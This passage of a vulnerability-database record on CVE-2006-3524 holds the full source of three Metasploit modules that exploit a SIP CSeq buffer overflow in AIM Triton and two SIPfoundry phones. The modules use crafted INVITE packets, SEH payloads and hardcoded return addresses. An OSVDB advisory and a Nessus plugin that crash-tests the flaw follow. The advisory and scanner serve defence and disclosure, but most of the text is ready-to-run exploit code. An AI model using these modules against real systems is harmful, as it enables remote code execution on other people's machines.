Triton 1.0.4 CSeq Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in AOL\\'s AIM\r\n\t\t\t\tTriton 1.0.4. 
By sending an overly long CSeq value,\r\n\t\t\t\ta remote attacker could overflow a buffer and execute\r\n\t\t\t\tarbitrary code on the system with the privileges of\r\n\t\t\t\tthe affected application.\r\n\t\t\t},\r\n\t\t\t'Author' => 'MC',\r\n\t\t\t'Version' => '$Revision: 9525 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2006-3524'],\r\n\t\t\t\t\t['OSVDB', '27122' ],\r\n\t\t\t\t\t['BID', '18906'],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'seh',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 400,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x20\\x09\\x0d\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'AIM Triton 1.0.4 Universal', { 'Ret' => 0x4017b3d9 } ], # coolcore45.dll\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Jul 10 2006',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(5061)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect_udp\r\n\r\n\t\tuser = rand_text_english(2, payload_badchars)\r\n\t\tport = rand(65535).to_s\r\n\t\tfiller = rand_text_english(792, payload_badchars)\r\n\t\tseh = generate_seh_payload(target.ret)\r\n\t\tfiller[780, seh.length] = seh\r\n\r\n\t\tsploit = \"INVITE sip:#{user}\\@127.0.0.1 SIP/2.0\" + \"\\r\\n\"\r\n\t\tsploit << \"To: <sip:#{rhost}:#{rport}>\" + \"\\r\\n\"\r\n\t\tsploit << \"Via: SIP/2.0/UDP #{rhost}:#{port}\" + \"\\r\\n\"\r\n\t\tsploit << \"From: \\\"#{user}\\\"<sip:#{rhost}:#{port}>\" + \"\\r\\n\"\r\n\t\tsploit << \"Call-ID: #{(rand(100)+100)}#{rhost}\" + \"\\r\\n\"\r\n\t\tsploit << \"CSeq: \" + filler + \"\\r\\n\"\r\n\t\tsploit << \"Max-Forwards: 20\" + \"\\r\\n\"\r\n\t\tsploit << \"Contact: <sip:127.0.0.1:#{port}>\" + \"\\r\\n\\r\\n\"\r\n\r\n\t\tprint_status(\"Trying target 
#{target.name}...\")\r\n\r\n\t\tudp_sock.put(sploit)\r\n\r\n\t\thandler\r\n\t\tdisconnect_udp\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16353/"}], "metasploit": [{"lastseen": "2020-08-19T23:33:07", "description": "This module exploits a buffer overflow in AOL\\'s AIM Triton 1.0.4. By sending an overly long CSeq value, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.\n", "published": "2006-11-02T01:16:40", "type": "metasploit", "title": "AIM Triton 1.0.4 CSeq Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3524"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/SIP/AIM_TRITON_CSEQ", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Udp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'AIM Triton 1.0.4 CSeq Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in AOL\\'s AIM\n Triton 1.0.4. 
By sending an overly long CSeq value,\n a remote attacker could overflow a buffer and execute\n arbitrary code on the system with the privileges of\n the affected application.\n },\n 'Author' => 'MC',\n 'References' =>\n [\n ['CVE', '2006-3524'],\n ['OSVDB', '27122' ],\n ['BID', '18906'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n },\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x20\\x09\\x0d\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'AIM Triton 1.0.4 Universal', { 'Ret' => 0x4017b3d9 } ], # coolcore45.dll\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Jul 10 2006',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(5061)\n ])\n end\n\n def exploit\n connect_udp\n\n user = rand_text_english(2, payload_badchars)\n port = rand(65535).to_s\n filler = rand_text_english(792, payload_badchars)\n seh = generate_seh_payload(target.ret)\n filler[780, seh.length] = seh\n\n sploit = \"INVITE sip:#{user}\\@127.0.0.1 SIP/2.0\" + \"\\r\\n\"\n sploit << \"To: <sip:#{rhost}:#{rport}>\" + \"\\r\\n\"\n sploit << \"Via: SIP/2.0/UDP #{rhost}:#{port}\" + \"\\r\\n\"\n sploit << \"From: \\\"#{user}\\\"<sip:#{rhost}:#{port}>\" + \"\\r\\n\"\n sploit << \"Call-ID: #{(rand(100)+100)}#{rhost}\" + \"\\r\\n\"\n sploit << \"CSeq: \" + filler + \"\\r\\n\"\n sploit << \"Max-Forwards: 20\" + \"\\r\\n\"\n sploit << \"Contact: <sip:127.0.0.1:#{port}>\" + \"\\r\\n\\r\\n\"\n\n print_status(\"Trying target #{target.name}...\")\n\n udp_sock.put(sploit)\n\n handler\n disconnect_udp\n\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/sip/aim_triton_cseq.rb"}, {"lastseen": "2020-06-26T10:48:08", "description": "This module exploits a buffer overflow in SIPfoundry's sipXezPhone version 0.35a. 
By sending an long CSeq header, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.\n", "published": "2006-09-13T06:20:05", "type": "metasploit", "title": "SIPfoundry sipXezPhone 0.35a CSeq Field Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3524"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/SIP/SIPXEZPHONE_CSEQ", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Udp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SIPfoundry sipXezPhone 0.35a CSeq Field Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in SIPfoundry's\n sipXezPhone version 0.35a. By sending an long CSeq header,\n a remote attacker could overflow a buffer and execute\n arbitrary code on the system with the privileges of\n the affected application.\n },\n 'Author' => 'MC',\n 'References' =>\n [\n ['CVE', '2006-3524'],\n ['OSVDB', '27122'],\n ['BID', '18906'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x20\\x09\\x0d\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n\n 'Targets' =>\n [\n ['sipXezPhone 0.35a Universal', { 'Ret' => 0x1008e853 } ],\n ],\n\n 'Privileged' => false,\n\n 'DisclosureDate' => 'Jul 10 2006',\n\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(5060)\n ])\n end\n\n def exploit\n connect_udp\n\n print_status(\"Trying target #{target.name}...\")\n\n user = rand_text_english(2, payload_badchars)\n port = rand(65535).to_s\n filler = rand_text_english(260, payload_badchars)\n seh = generate_seh_payload(target.ret)\n filler[252, seh.length] = seh\n\n sploit = 
\"INVITE sip:#{user}\\@127.0.0.1 SIP/2.0\" + \"\\r\\n\"\n sploit << \"To: <sip:#{rhost}:#{rport}>\" + \"\\r\\n\"\n sploit << \"Via: SIP/2.0/UDP #{rhost}:#{port}\" + \"\\r\\n\"\n sploit << \"From: \\\"#{user}\\\"<sip:#{rhost}:#{port}>\" + \"\\r\\n\"\n sploit << \"Call-ID: #{(rand(100)+100)}#{rhost}\" + \"\\r\\n\"\n sploit << \"CSeq: \" + filler + \"\\r\\n\"\n sploit << \"Max-Forwards: 20\" + \"\\r\\n\"\n sploit << \"Contact: <sip:127.0.0.1:#{port}>\" + \"\\r\\n\\r\\n\"\n\n udp_sock.put(sploit)\n\n handler\n disconnect_udp\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/sip/sipxezphone_cseq.rb"}, {"lastseen": "2020-03-14T07:31:47", "description": "This module exploits a buffer overflow in SIPfoundry's sipXphone 2.6.0.27. By sending an overly long CSeq value, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.\n", "published": "2006-11-01T12:14:54", "type": "metasploit", "title": "SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3524"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/SIP/SIPXPHONE_CSEQ", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Udp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in SIPfoundry's\n sipXphone 2.6.0.27. 
By sending an overly long CSeq value,\n a remote attacker could overflow a buffer and execute\n arbitrary code on the system with the privileges of\n the affected application.\n },\n 'Author' => 'MC',\n 'References' =>\n [\n [ 'CVE', '2006-3524' ],\n [ 'OSVDB', '27122' ],\n [ 'BID', '18906' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x20\\x09\\x0d\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'SIPfoundry sipXphone 2.6.0.27 Universal', { 'Ret' => 0x08016aac } ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Jul 10 2006',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(5060)\n ])\n end\n\n def exploit\n connect_udp\n\n user = rand_text_english(2, payload_badchars)\n port = rand(65535).to_s\n filler = rand_text_english(212, payload_badchars)\n seh = generate_seh_payload(target.ret)\n filler[204, seh.length] = seh\n\n sploit = \"INVITE sip:#{user}\\@127.0.0.1 SIP/2.0\" + \"\\r\\n\"\n sploit << \"To: <sip:#{rhost}:#{rport}>\" + \"\\r\\n\"\n sploit << \"Via: SIP/2.0/UDP #{rhost}:#{port}\" + \"\\r\\n\"\n sploit << \"From: \\\"#{user}\\\"<sip:#{rhost}:#{port}>\" + \"\\r\\n\"\n sploit << \"Call-ID: #{(rand(100)+100)}#{rhost}\" + \"\\r\\n\"\n sploit << \"CSeq: \" + filler + \"\\r\\n\"\n sploit << \"Max-Forwards: 20\" + \"\\r\\n\"\n sploit << \"Contact: <sip:127.0.0.1:#{port}>\" + \"\\r\\n\\r\\n\"\n\n print_status(\"Trying target #{target.name}...\")\n\n udp_sock.put(sploit)\n\n handler\n disconnect_udp\n\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/sip/sipxphone_cseq.rb"}], "osvdb": [{"lastseen": "2017-04-28T13:20:23", "bulletinFamily": "software", "cvelist": ["CVE-2006-3524"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in SIPfoundry, Inc. siXtapi. 
The program fails to validate the length of the 'CSeq' field of an INVITE message resulting in a buffer overflow. With a specially crafted message, an attacker can run arbitrary code resulting in a loss of integrity.\n## Technical Description\nSIPfoundry, Inc. sipXtapi is not distributed as a versioned package. The versions released before March 24th, 2006 are vulnerable to this issue.\n## Solution Description\nUpgrade to versions released on or after 2006-03-24, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in SIPfoundry, Inc. siXtapi. The program fails to validate the length of the 'CSeq' field of an INVITE message resulting in a buffer overflow. With a specially crafted message, an attacker can run arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.sipfoundry.org/\nSecurity Tracker: 1016455\n[Secunia Advisory ID:20997](https://secuniaresearch.flexerasoftware.com/advisories/20997/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0109.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0495.html\nKeyword: ERNW Security Advisory 02-2006\nISS X-Force ID: 27681\nFrSIRT Advisory: ADV-2006-2735\n[CVE-2006-3524](https://vulners.com/cve/CVE-2006-3524)\nBugtraq ID: 18906\n", "modified": "2006-07-10T10:33:55", "published": "2006-07-10T10:33:55", "href": "https://vulners.com/osvdb/OSVDB:27122", "id": "OSVDB:27122", "title": "sipXtapi INVITE Message CSeq Field Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-04-01T06:03:14", "description": "The remote host is running a SIP user agent that appears to be compiled\nusing a version of SIP Foundry's SipXtapi library before March 24, 2006. 
\nSuch versions contain a buffer overflow flaw that is triggered when\nprocessing a specially crafted packet with a long value for the 'CSeq'\nfield. A remote attacker may be able to exploit this issue to execute\narbitrary code on the affected host subject to the privileges of the\ncurrent user.", "edition": 28, "published": "2006-07-25T00:00:00", "title": "sipXtapi INVITE Message CSeq Field Header Remote Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3524"], "modified": "2021-04-02T00:00:00", "cpe": [], "id": "SIPXTAPI_CSEQ_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/22092", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22092);\n script_version(\"1.25\");\n script_cvs_date(\"Date: 2019/03/06 18:38:55\");\n\n script_cve_id(\"CVE-2006-3524\");\n script_bugtraq_id(18906);\n\n script_name(english:\"sipXtapi INVITE Message CSeq Field Header Remote Overflow\");\n script_summary(english:\"Sends an SIP packet with a bad CSeq field\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains an application that is vulnerable to a remote\nbuffer overflow attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a SIP user agent that appears to be compiled\nusing a version of SIP Foundry's SipXtapi library before March 24, 2006. \nSuch versions contain a buffer overflow flaw that is triggered when\nprocessing a specially crafted packet with a long value for the 'CSeq'\nfield. 
A remote attacker may be able to exploit this issue to execute\narbitrary code on the affected host subject to the privileges of the\ncurrent user.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439617/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2006/Jul/161\");\n script_set_attribute(attribute:\"solution\", value:\"Contact the software vendor to see if an upgrade is available.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_DENIAL);\n script_family(english:\"Misc.\");\n script_copyright(english:\"This script is Copyright (C) 2006-2019 Tenable Network Security, Inc.\");\n\n script_dependencies(\"sip_detection.nasl\");\n script_require_ports(\"Services/udp/sip\", \"Services/sip\");\n\n exit(0);\n}\n\nfunction try_dos(port, proto)\n{\n local_var res, res2, soc, soc2, encaps, via_protocol, probe, sploit;\n\n if (proto == 'udp')\n {\n if (!get_udp_port_state(port)) return FALSE;\n if (islocalhost()) soc = open_sock_udp(port);\n else soc = open_priv_sock_udp(sport:port, dport:port);\n }\n else\n {\n if (!get_tcp_port_state(port)) return FALSE;\n soc = open_sock_tcp(port);\n }\n if (!soc) return FALSE;\n\n via_protocol = 
proto;\n\n encaps = get_port_transport(port);\n if (!isnull(encaps) && proto == 'tcp')\n {\n if (encaps && encaps > ENCAPS_IP)\n via_protocol = 'tls';\n }\n\n # Make sure the service is up.\n #\n # nb: this is what's used in sip_detection.nasl.\n probe =\n \"OPTIONS sip:\" + get_host_name() + \" SIP/2.0\" + '\\r\\n' +\n \"Via: SIP/2.0/\" + toupper(via_protocol) + \" \" + compat::this_host() + \":\" + port + '\\r\\n' +\n 'Max-Forwards: 70\\r\\n' +\n \"To: <sip:\" + compat::this_host() + \":\" + port + '>\\r\\n' +\n \"From: Nessus <sip:\" + compat::this_host() + \":\" + port + '>\\r\\n' +\n \"Call-ID: \" + rand() + '\\r\\n' +\n 'CSeq: 63104 OPTIONS\\r\\n' +\n \"Contact: <sip:\" + compat::this_host() + '>\\r\\n' +\n 'Accept: application/sdp\\r\\n' +\n 'Content-Length: 0\\r\\n' +\n '\\r\\n';\n\n send(socket:soc, data:probe);\n res = recv(socket:soc, length:1024);\n\n if (!strlen(res) || isnull(res))\n {\n close(soc);\n return FALSE;\n }\n\n # http://en.wikipedia.org/wiki/List_of_SIP_response_codes\n if (!egrep(pattern:\"^SIP/2\\.0 [1-3][0-9][0-9] \", string:res))\n {\n close(soc);\n return FALSE;\n }\n\n # Try to crash the service.\n sploit =\n \"INVITE sip:user@\" + get_host_name() + \" SIP/2.0\" + '\\r\\n' +\n \"To: <sip:\" + compat::this_host() + \":\" + port + '>\\r\\n' +\n \"Via: SIP/2.0/\" + toupper(via_protocol) + \" \" + compat::this_host() + \":\" + port + '\\r\\n' +\n \"From: Nessus <sip:\" + compat::this_host() + \":\" + port + '>\\r\\n' +\n \"Call-ID: \" + rand() + '\\r\\n' +\n 'CSeq: 115792089237316195423570AAAA\\r\\n' +\n 'Max-Forwards: 70\\r\\n' +\n \"Contact: <sip:\" + compat::this_host() + '>\\r\\n' +\n '\\r\\n';\n\n send(socket:soc, data:sploit);\n res = recv(socket:soc, length:1024);\n close(soc);\n\n if (!strlen(res) || isnull(res))\n {\n res2 = NULL;\n\n if (proto == 'udp')\n {\n if (islocalhost()) soc2 = open_sock_udp(port);\n else soc2 = open_priv_sock_udp(sport:port, dport:port);\n }\n else\n {\n soc2 = open_sock_tcp(port);\n }\n if (soc2)\n {\n 
send(socket:soc2, data:probe);\n res2 = recv(socket:soc2, length:1024);\n close(soc2);\n }\n # double check to make sure service is actually down\n if (!strlen(res2) || isnull(res2))\n {\n security_hole(port:port, proto:proto);\n return TRUE;\n }\n }\n return FALSE;\n}\n\nudp_ports = get_kb_list(\"Services/udp/sip\");\ntcp_ports = get_kb_list(\"Services/sip\");\n\nis_vuln = FALSE;\n\n# loop through TCP ports\nif (!isnull(tcp_ports))\n{\n foreach port (make_list(tcp_ports))\n {\n if (try_dos(port:port, proto:\"tcp\")) is_vuln = TRUE;\n }\n}\n\n# loop through UDP ports\nif (!isnull(udp_ports))\n{\n foreach port (make_list(udp_ports))\n {\n if (try_dos(port:port, proto:\"udp\")) is_vuln = TRUE;\n }\n}\n\nif (!is_vuln) exit(0, \"The remote SIP services are not vulnerable.\");\nelse exit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}